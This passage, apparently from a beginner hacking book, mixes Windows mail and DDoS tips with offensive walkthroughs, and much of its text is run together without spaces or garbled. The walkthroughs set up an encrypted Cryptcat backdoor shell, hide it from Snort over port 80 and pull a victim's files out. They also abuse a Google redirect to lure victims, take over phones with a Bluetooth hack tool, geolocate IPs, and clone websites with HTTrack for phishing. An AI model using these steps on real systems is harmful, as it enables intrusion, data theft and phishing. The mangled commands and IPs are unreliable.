unfilledspotandselectNewShortcutandfollowtheinstructions.

Tofinishtheoperation,signoutofWindowsandthenenteragaintoseeyour

newPowerUserMenu.

•Whynotfoolyourwindow’sMailappintoutilizingPOPmail

Asyounoticed,thisWindowsiswaymoredifferentthantheotherversionsand ithasalotofsurprisingthingstoexplore.Thiskindofwindowswillnotwork with POP3 mail protocol and all the email accounts that use this type of protocol,itisworkingwithaccountsthatuseIMAP.

YoucanchangethisandmakeanyemailaddresstogetPOP3-basedmailfroma

POP3accountandthensetupyourWindowstogetmailsfromthataccount.

Firstofall,ifyouhaveanOutlookmailaccountthenconfigureittogetPOP3

mailbyfollowingthenextinstructions:

1.Loginandclickonthesettingsiconandselecttheoption“Moremail

settings”

2.Youwillfindunderyour“Managingyouraccount”optionanotheroption

called“Youremailaccounts”andafterthatselect“Addasend-and-receive account”

3.Onceyoudidthis,ascreenshouldpopupandselectfromthatscreen

“Advancedoptions”. 4.Ifyouaregoingtoaccessyourmailfrommultipledevices ensurethat youleaveamessageontheserver.

5.Afterthat,youwillbeaskedtocreateanewfolderforthemailorkeepit

inyouremailaddress,hereyouarefreetochoosewhatyouwantandafter

thatclicknext.

6.TheywillsendyouaverificationmailtoyourPOPaccount,youmust

clickonthatlinkandyouwillberedirectedtoanOutlookpagethatwilltell

youthatyouaresetup.

Now,youaredone.

Also,youcanconfigureyourGmailtogetPOP3mailattemptingthenextsteps:

1.OpenyourGmailaccountandselectSettings,afterthatselectAccounts

andimportandnextselectAddaPOP3mailaccountyouown.

2.Ascreenshouldshowup,enteryourGmailaddressthere.

3.Anotherscreenshouldappearhereaswell,givealltheinformationyou

needtoaccessyourPOPaccountandifyoudonotknowitpleasecheck

withyourmailprovider.

4.Afteryouresolvedtheproblem,clickonAddAccount.Andmakesure

youtellGmailthatyouwantaswelltosendmessagesfromyouraccount

notonlygetthem.

5.NowyoushouldreceiveaverificationmailonyourPOP3account,click

onthelinkandfollowtheindications.

ThelastthingtodoisrunningWindows8Mailapp,inordertodoitpleasehit

theWindowskeyonyourkeyboard+CandWindowswilldisplayCharmsbar,

onceyouseeitselectSettings,nextselectAccountsandAddanaccount.

InordertogetmailfromOutlook.com,selectitonthescreenandenteryour email address and password and click Connect. To get a Gmail mail select GoogleonthescreenandtherestisthesameasinOutlook.comcase.

Enjoythenewsettings!

So,asweallknownow,DDoSattacksareveryfrequentandtheirnumberis

growinghourbyhour,soherearesometipstohelpyouavoidaDDoSattack:

•BeforetakinganymeasuresyoushouldunderstandwhataDDoSattackis. DDoS (distributed denial-of-service) attacks happen when attackers try to compromiseacomputerbymakingitsrecoursesinaccessibletoitsuser.

•Inordertoprotectyourcomputer,buymoreBandwidthbecauseinthiscase

moreisbetter.

Makesureyouhaveenoughbandwidthonyourownweb.Thisallowsyouto

tackleunsophisticatedDDoSattacksbygettingmorebandwidthtoservethe

requests.IthelpsalotbecauseaDDoSattackissuchacapacitygame.

• Choose DDoS migration services; you can request it from your internet provider, it is better to search for the provider that has the largest DDoS protectionnetwork.YoucanalsoutilizeaDDoSpreventionpieceofequipment whichcouldbespeciallycreatedtopreventDDoSattacks.

•Restrictyourconnectivity!

Ifyouhavecomputerprograms/systemswhichareinadirectconnectionwith

thewebinstallafirewallbecauseitisofferingyouaplusofprotection.

Hackingissuchanenjoyableactivity,butifyouwanttohackmakesureyou willbeundetected,ifyoudonotknowhowthenthisbookhasananswerfor you. Do you know how to make a nearly and undetectable backdoor using Cryptcat?Itisfuntolearnandapply,ifyouwanttodoitpleasefollowthenext directions:

First,youhavetosearch,downloadandinstallCryptcatonyoursystemwhichis

anencryptingnetcatandyoucangetitbutitisalittlebithardertofinditonthe

internetsohereitisthelinkhttp://sourceforge.net/projects/cryptcat/files/.

Thecommunicationbetweentwodevicesisencryptedusingtwofishwhichisa great algorithm, the encryption is on par with AES one making it nearly impossibletofind.

Afteryouinstallit,movetothenextstepbyopeningaListeneronyoursystem withasimilarsyntaxtonetcat,inthefollowingexamplewewillopenitona

windows7onport6996:

cryptcat-l-p6996-ecmd.exe

andthecommandpromptwillshow:

C:\nt>cryptcat-1 -p6996 -e cmd.exe

ThenextstepisopeningSnotoranyotherIDS,youshouldstartituponanother system which will stick together with the Windows system to check if the encryptioniscapableofblindingtheIDS,becausewewanttokeepourinvisible tothesecuritysystems.

root@bt:~# snort -dev-c /etc/snort/snort.conf

encryptedbackdoorconnectionthatisnotpossibletofind.

cryptcat192.168.4.182.2486996 andthenextwillbedisplayed:

root@bt:~#cryptcat192.168.182.2486996

MicrosoftWindows[Version5.2.3790]

(C)Copyright1985-2003MicrosoftCorp.

C:\>

Ifsomethingsimilartotheabovepopsupthenyouareontherightwaybecause

youhavejustconnectedtothesystemandreceivedacommandshellfromthe

system.

Tocontinue,seewhatisgoingonwithyourSnortLogsandAlertbecausethis

typeofattackusingacommandshellpassedacrossthelineisdetectableusing

SnortorIDS’siftheconnectionisencryptedatthatmoment.

Snortrulesaresendingalertstotheadminthatacmd.exeshellistraveling

acrosstheirnetworkconnectionbutwithyourencryptedconectionincryptcatit

shouldbeimpossibletodetect.

CheckyouralertsandlogsinSnort,ifeverythingisgoingonasitshouldyou should not get any alerts on the subject of command shell. In order to be successful you should connect to the system without getting any kind of attentionfromsecuritysystems.

Tocontinuetheoperation,youshouldevadethefirewallbysendingcryptcat

overport80.Evenifyouhaveshapedabackdooronyourvictim’ssystemsome

oftheadministratorsmaynoticethatport6996isopenwhichisnotnormalatall

(forthem).

Networksarecapableofcommunicationontheinternetiftheykeeptheports80

and443andmaybe25,53,110open.

Afteryoulearnedhowtousecryptcatyoushouldsendittoport80withtheall

traffic.Itwilllooklikeanyotherbinarydatacrossingthelineevenifitis

encryptedandthatisthereasonwhyitisundetectableandimpossibletoblock,

theIDSisnotcapableofseeingwhatitcontains.

Ifyouwanttomoveafilefromyourvictim’ssystemtoyourswithoutbeing

undetectedyoushouldsendafilewiththesamenameasthestolenfileacross

theencryptedconnection,youcandoitbytypingthisinthecommandprompt:

cryptcat-lp80<topsecret.txt andthecommandpromptwillshowC:\>cryptcat -1p80 <topsecret.doc

Thenextstepisconnectingtothevictim’ssystemandputsecretfileonyour victim’s system. Connect to the listener by typing cryptcat and the Internet Protocoladdressofyourvictim’ssystemandtheportnumbertothelistener.

cryptcat192.168.182.24880

Andafterdoingthisthefileyouwantthestealshouldcometoyou.Checkthe

filealertafteragaintomakesureyouareundetected.

kwrite/var/snort/alerts

Youcannoticethatthefilehascrossedthoughport80undertheeyesofIDS

withoutbeingundetected.

Cryptcatisagrandlittleinstrumentformovinginformationoffthevictim's

systemacrossthetypicalopenportswithoutanyofthesecuritydevices

detectingit.

So,thismethodisoftenusedbyhackersandalotofdevicesarehackedinthis

waywithoutbeingundetected.Donotbeafraidoftrying!

Wanttotrickvictimsandmakethemyourvisitors?Youcanmakeitandthis

bookisgoingtoshowyouhow.Redirectingvictimstoyourwebsiteiscrucialif

wetalkabouthackingbecausefewmethodsusedinhackingincludethistrick.

So,ifyouwantoredirectanysitefromGooglepleasegotoGoogleRedirect

ExploitandaftergettingthereyoushouldenteryourURLinaboxonthatpage.

AfteryouenteryourURLpleaseclickonSubmitandGoogle’sURLshould

produceanotherURLstartingwithgoogle.combutwithafewcharactersinplus,

thatwillbeyourURL.Andnowyoucanstartusingitandanypersonshouldbe

directedtoyoursiteviayourURL.

Also,thereareseveralwebsitewhichareforbiddenbygovernmentbecausethey arebreakingthelawsoftheircountry,ifyouwanttoaccesssuchawebsitethey

mightrequestyoutodownloadseveralfiles/programswhichin80%ofthecases

aremalware,sopleasedonotdownloadanythingstrange.

Thereisatrickyoucanuseifyouwanttoenterbannedwebsitesthatdoesnot request any download, in order to start using it you should firstly open incloack.comusingyourbrowseroryoucanuseanyproxysiteyoutrustinstead ofthesuggestedone.

Afteryouchooseyourproxysite,searchforaboxthatisrequestinganURL,the

URLyoushouldentermustbethebannedsiteURL.

ThelaststepisclickingonHideMeoptionandsurftheinternet.

Protectthesensitivedataonyourcomputerbyputtingitinahiddenfolder,to

createahiddenfolderonyoursystempleasefollowthenextindications:

1.GotostartmenuandclickonRun

2.Writecmdandpunchenterinordertoopenyourcommandprompt

3.Next,writeD:andstrikeenteragain

4.Writemdcon\andstrikeenter

5.Inplaceofmdyoucanuseoneofthefollowingwordsaux,lpt1,lpt2,lpt3up

tolpt9

6.Youshouldopenthedirectoryandfindafilecreatedwiththenamecon

IfyouwanttodeletethatfolderWindowswillshowerror,butifyoureallywant

todoit,hereishowtodeleteit:

First,openCommandpromptanttypeD:andhitenter,afterthattyperdcon\

andifyouopenthedirectoryagainyouwillfindoutthatthefileisdeleted.

Asweknow,computerhackingisnottheonlytypeofhackingandthereare

manyothers,butmobilephonehackinghasbecomeveryfamousbecauseifyou

hackamobilephoneyoucangetsensitivedataandyoucandoawholesetof

activitiessuchasreadingmessages,getbackthephonetothefactorysettings,

ultimatelyswitchingonandoffthephone,changingthephone’sringingvolume,

seecontactsorplayringtoneevenifthephoneisonsilentmode,allthose

actionswillmakethehackedphonelooklikeitwouldbecontrolledbythe

evilestpowers.

*NOTE:ThefollowingmethodinphonehackingrequestaBluetoothenabled

phonebecauseitisbasedonBluetooth.

steps:

EntertheinternetandsearchforSuperBluetoothHack1.8,afteryoufindit

pleasedownloadandinstallit.Afterthatmakesurethatyourphoneisinthelist

ofhandledhandsetsfromthelinkdelivered,afteryougetthe.jarfile,installit

onyourphone.

Theinterestingandgoodthingaboutthismethodisthatyoudonothaveto

installthesoftwareonthephoneyouwanttohackandthisisrisingupthe

method’sefficiency.

Forgettingintothenextstep,turnontheBluetoothofyourhandsetandafter that please open the Super Bluetooth Hack App you just downloaded and installed.

Next,youshouldselecttheconnectoptionandafterthatselectInquiryDevices

inordertolookforanymobilethathastheBluetoothenablednear/aroundyou.

Pairingbetweenthephonesisveryimportantsoyourvictimmusthavethe

Bluetoothturnedon;aftertheapplicationfindsyourvictim’sphoneyoucanstart

exploringit!

Most methods of hacking are requesting the Internet Protocol address and sometimesitistheonlythingthathackersshouldknowinordertostarthacking, butwhatifyoucouldhideit?Itwillbeanothersecuritymeasuretakenbyyou againsthackers.ByhidingyourInternetProtocoladdressyouwillbeabletosurf theinternetanonymouslywithoutleavinganymarkthatcanguidetoyou,hide yourgeographicalpositionontheglobeandthemostimportant,tostaysafe.

ThesafestandsecuredwaytohideyourInternetProtocolisbyusingatrusted

VPNservice,forexampleVyprVPNwhichwillofferyoutheserviceswiththe

highestspeedonthemarket.

AVPN service is always better than any other method because the service encryptsallyourinternettraffic,itiskeepingthespeedhighanddoesnothave anyeffectonitincomparisonwithothermethodsandyoucanavoidlocation blockswithoutanyeffort.

AnothermethodtohideyourInternetProtocolisusingwebsitebasedproxy

serverssuchasanonymouse.org,andbecauseitiswebbasedtheydonotrequest

anydownloadorinstallationwhichishelpingyoutosavespace.

InternetProtocoladdressyouthatwillconfigureyourbrowserwithandstart hiding your original Internet Protocol address. The only problem with this methodisthatithasbecameverypopularthoughthetimeandasitdoesnot requestmoneymostofthepeopleuseitbecausetheyprefertonotpayandgeta secondqualityserviceandasaneffecttheyperformtooslowundernormal parameterswhichisnotlikelyatall.

Hackingcansaveordestroylives,itcandestroyavictim’slifeorahacker’slife

buteverythingdependsabouthowbothofthemareplaying,itisdepending

moreonthehackertochoosewhathewantandthinkreallygoodbeforehestart

theactionanditisdependingonthevictim’sattitudeaswellbecauseinareal

gamethereisnotonlyaplayer.Everythingdependsonhowbothplayersare

handlingthesituationandiftheyknowtoturnitintheirfavor.

NowthatwelearnedhowtohideanInternetProtocoladdress,weshouldlearn

howtofindtheexactlocationofanyInternetProtocoladdresssoherewego.

This method requires a Linux system and if you have it you can start immediately.FireupyourKalisystemandcontinuewithopeningaterminal.

Next,youwillneedtheDatabaseandyoucandownloaditfromMaxMindwhich

isabigcompanythatownsthedatabaseoftheworldbecauseitcontainsevery

InternetProtocolAddressaccompaniedbyitsGPScoordinatesontheglobe,zip

codeandallthedetailsyouneedinordertoknoweverythingabouttheInternet

ProtocolAddressanditsplaceontheglobenomatteronwhichcornerinthe

worldistheIPlocatedandyoucanobtainitbywritingthenexttext:

kali

http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz

>

wget

-N

-q

andthenyouwillhavetounzipit

kali>gzip-dGeoLiteCity.dat.gz

root@kali:~#wget-N-qhttp://googlecode.com

AfterthatyouwillhavetoinstallPythonscript(pygeoip)inordertocontinue

theoperationsopleasedoitbecauseithelpsalotinreadingthedatabase.

You can get it by writing the next text: kali > wget http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip
You
can
get
it
by
writing
the
next
text:
kali
>
wget
http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

Andthecomputerwillshowsomethingsimilarto:

--2015-080-1911:15:29--http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

Resolvingpygeoip.googlecode.com(pygeoip.googlecode.com)…74.125.69.82,

2607:f8b0:4001:c05::52

Connecting to pygeoip.googlecode.com (pygeoip.googlecode.com) |

74.125.69.82|

HTTPrequestsent,awaitingresponse….200OK

Length:14672(14K)[application/empty]

Savingto:`pygeoip-0.1.3.zip’

100%[==============]14,672--.–K/s in0.1s

--2015-080-1911:15:29(124KB/s)- `pygeoip-0.1.3zip’saved[14672/14672]

root@kali:~#

Andafterthat,youwillhavetounzipitbyusingthenextsyntaxkali>unzip

pygeoip-0.1.3.zip,andthescreenwillshowyousomethingsimilarto:

root@kali:~#unzippygeoip-0.1.3.zip

Archive: pygeoip-0.1.3.zip

Inflating:pygeoip-0.1.3/PKG-INFO

Inflating:pygeoip-0.1.3/README

Inflating:pygeoip-0.1.3/setup.cfg

Inflating:pygeoip-0.1.3/setup.py

Inflating:pygeoip-0.1.3/pygeoip/const.py

Inflating:pygeoip-0.1.3/pugeoip/util.py

Inflating:pygeoip-0.1.3/pygeoip/ init py

Inflating:pygeoip-0.1.3/pygeoip.egg.info/dependency_links.txt

Inflating:pygeoip-0.1.3/pygeoip.egg.info/PKG-INFO

Inflating:pygeoip-0.1.3/pygeoip.egg.info/SOURCES.txt

Inflating:pygeoip-0.1.3/pygeoip.egg.info/top_level.txt

Nextyoushoulddownloadsometoolsforpygeoip:

kali>cd/pygeoip-0.1.3

kali>wgethttp://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

kali>wgethttp://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg

root@kali:~/pygeoip-0.1.3#wget

http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

--2015-08-19

http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

11:30:54--

Resolvingsvc.python.org(svc.python.org)….82.94.164.164,

2001:888:2000:d::a4

Connectingtosvc.python.org(svc.python.org)|82.94.164.164| :80…connected.

HTTPrequestsent,awaitingresponse…200OK

Length:7575 (7.4K)[text/plain]

Savingto:`ez_setup.py’

100%[==================] 7,57547.1K/s in0.2s

2015-08-1911:35:21(47.1KB/s)-`ez_setup.py’saved[7575/7575]

root@kali:~/pygeoip-0.1.3#wget

http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py.5.egg

--2015-09-1911:45:02--http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-

py2.5.egg

Resolvingpypi.python.org (pypi.python.org)…199.27.79.223

Connecting to pypi.python.org (pypi.python.org) |199.27.79.223| : 80 … connected.

HTTPrequestsent,awaitingresponse…301MovedPermanently

Location: https://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg [following]

--2015-08-19

0.6c11-py2.5egg

11:45:54--https://pypi.python.org/packages/2.5/s/setuptools-

Afterdownloadingyoushouldstartmovingandinstallsomesetuptools:

kali>mvsetuptools-0.6c11-py2.5.eggsetuptools-0.7a1-py2.5.egg

kali>pythonsetup.pybuild

kali>pythonsetup.pyinstall

Anditshouldshowupsomethinglikewhatisbelow:

root@kali:~/pygeoip-0.1.3# mvsetuptools-0.6c11-py2.5.eggsetup

tools-0.7al-py2.5.egg

root@kali:~/pygeoip-0.1.3# pythonsetup.pybuild

runningbuild

runningbuild_py

creatingbuild

creatingbuild/lib.linux-i686-2.7

creatingbuild/lib.linux-i686-2.7/pygeoip

copyingpygeoip/ init py->build/lib.linux-i686-2.7/pygeoip

copyingpygeoip/const.py->build/lib.linux-i686-2.7/pygeoip

copyingpygeoip/util.py ->build/linux-i686-2.7/pygeoip

Nowyouhavetomovedatabasetopygeoipdirectory.

Afteryoumakesurethatyouhavethedatabasewhereitissupposedtobeand

thepygeoipinstalledonyoursystemyoushouldstarttointerrogatethedatabase

usingpygeoip.TakeattitudeandstartaPythonshellandafterthatyoushouldbe

welcomedby“>>>”whichconfirmsthatyouareinanpythonshell,continueby

importingthemodule:

>>>importpygeoip

>>>gip=pygeopip.GeoIP('GeoLiteCity.dat')

Afterthatyoushouldbereadytostarttheinterrogation,golookwhereisGoogle

located.

>>>forkey.valinrec.items():

print"%s:%s"%(key,val)

print"%s:%s"%(key,val)

Iftheoperationisgoingrightthenyoushouldseeascreenthatindicatessimilar

contenttowhatisbelow:

>>>rec=gip.recorded_by_addr(`64.233.161.99’)

>>>forkey.valinrec.items():

print"%s:%s"%(key,val)

City:MountainView

Region_name:US

Area_code:650

Longitude:-122.0574

Country_code3:USA

Latitude: 37.4192

Postal_code:94043

Dma_code:807

Country_code:US

Country_name:UnitedStates

>>>

Asyounoticed,wefoundoutGoogleIPaddress.

Butdoesyourcuriositygetsatisfiedonlywiththat?Thatwasjustaconfirmation ofthesuccessyouexpectedbuttherealsecretofsuccessisthatyoushould never stop trying, so try now to find out the location of the IPaddress of cnn.com.

>>>rec=gip.record_by_addr(`157.166.226.25’)

>>>forkey,valinrec.items():

… print"%s:%s"%(key,val)

City:Atlanta

Region_name:GA

Area_code:678

Longitude:-84.388

Country_code3:USA

Latitude:33.749

Postal_code:30348

Dma_code:524

Country_code:US

Country_name:UnitedStates

>>>

CNN’sInternetProtocolwasjustdiscoveredduetothemixofdatabaseand

pygeoipwithsomeattentionandwork,ahackercoulddoanything.

* IMPORTANT NOTE: all the presented operations should be done with a maximumofattentionandpatience.Skillsarecrucialinthiskindofoperations andalotofexerciseisneededinordertogetthesuccessfromthefirsttimeyou try.Makesureyourespectallthesyntaxesandcodesbecauseinhackingeven typingwrongalettercouldbecrucialandguidewrongthewholeoperation endingupwithahugefailureormaybeanewdiscovery.Informaticsareinthe samefamilywithmathematicswhereyouhavetofindsolutionsforproblemsas well,thinkandreactwithspeed,beveryskilledandthemostimportantcommon featureisthatifyoumakejustasmall/unnoticedmistakeyoumightdestroy literallyeverything.

Areyouinterestedincloningwebsites?Ifyouwanttotryallthemethodsof hackingthenyouranswerisyesforsurebecausetherearemethodsofhacking whicharerequestingtoredirectvictimstoyourwebsiteswhichshouldlook identicalastheonesyouwanttohack,infactthatisthekeytosucceed!Why complicate yourself and waste your precious time and ideas on creating an identicalwebsite?Youcanjustcloneitandyourhackishalfdone.

HTTrackistheinstrumenttouseincopyingwebsites,prepareyourharddrive

becauseHTTrackismakingcopiesofanywebsiteyouwantandafterthatitis

copyingittoyourharddrive.Twinsarealwaysdifferentandtherewillalways

beagoodtwinandabadtwin,thesameiswithcreatingthesewebsites,youwill producethebadtwinwhoisdoinggoodthingsforyou.Thetoolisefficientif we talk about social engineering and searching for any data on the cloned websitewithoutinternetwhichisagreatfeature,youcanusethistoolona Windows and Linux software because fortunately there are two versions of HTTrack.

BeginwithdownloadingandinstallingHTTrack,youcaninstallitbytypingthe syntax kali>apt-getinstallhttrack.

Afteryouhaveinstalledit,movetothenextstepandopenit,afterthat,please startlookingforthehelpfile. Kali>httrack--help

root@kali:~#httrack--help

HTTrackversion3.46(compiledJun23 2012)

Usage:httracks<URLs> [-option][+URL_Filter>] [+<mime:

MIME_FILTER>][-<mime:MIME_FILTER]

Withoptionslistedbelow:(*isdefaultvalue)

Generaloptions:

0pathformirror/logfiles+cache(-0path_mirror[,path_cache_and_logfiles])

(--path<param>)

%0chrootpathto,mustber00t(-0%root_path)(chroot<param>)

Actionoptions:

wmirrorwebsites(--mirror)

W mirrorwebsites,semi-automatic(asksquestion) (--mirror-wizard)

gjustgetfiles(savedinthecurrentdirectory) (--getfiles)

icontinueaninterruptedmirrorusingthecache

YmirrorALLlinkslocatedinthefirstlevelpages(mirrorlinks) (--mirror links)

Proxyoptions:

Pproxyuse(-Pproxy:portor–Puser:pass@proxy:port)(--proxy<param>)

%f *useproxyforftp (f0don’tuse)(--httpproxy-ftp[=N])

bind<param>)

Pleaseusethissyntaxtotellthetoolwheretosendthesite kali>httrack<the URLofthesite>[anyoptions]URLFilter-O<locationtosendcopyto>.

UsingHTTrackinstrumentisnotcomplicated,youjustneedtoplaceitatthesite

youwanttocloneandthenguidethe–Otoadirectoryinyourharddrivewhere

youintendtosavethewebsite.Whatisahackerthatdoesnottesthiswork?

Wellthathackerisnotaprofessionalone,sogotestthetoolyoujustinstalled.

Ifyouwilltrytocloneforexamplethewebsite webscantest.com usingthe followingsyntax kali>httrackhttp://www.webscantest.com-O /tmp/webscantest,youwillget:

root@kali:~#kali>httrackhttp://www.webscantest.com-O/tmp/webscantest

WARNING!Youareusingthisprogramasaroot!

Itmightbeagoodtousethe-%Uoptiontochangetheuserid:

Example:-%Usmith

MirrorlaunchedonWed,19Aug2015 16:02:45 byHTTrackWebsite

Copier/3.46+libhtsjava.so.2[XR&CO’2010]

Mirroringhttp://www.webscantest.comwiththewizardhelp

*www.webscantest.com/jsmenu/gotoframme.php?

foo3D+bar%3D+url%3Dhttps%3A%2F%2F

13/27

foo%3D+url%3Dhttps%3A

:www.webscantest.com/jsmenu/gotoframme.php?

*www.webscantest.com/business/account.php?accountId=123456789-abcdef

(1277bytes)

84/88:

www.webscantest.com/business/access.php?serviceid=123456789

(1266bytes)

85/88:www.webscantest.com/business/account.php?accountid=123456789-

abcdef (1277bytes)

Done:www.webscantest.com/bjax/servertime.php-OK

ThankyouforusingHTTrack!

Thenextthingtodoafteryoucopythewebsiteonyourharddriveistolookat the website clone and investigate it. Simply place your browser to /tmp/webscantest/www.webscantest.com/login.htmltoseewhatisgoingonwith theclonewebsite.

Donotyouseeanydifference?Exactly,thatisthepoint.Youreachedyourgoal

andcreatedexactlythetargetwebsitebutitiscloned.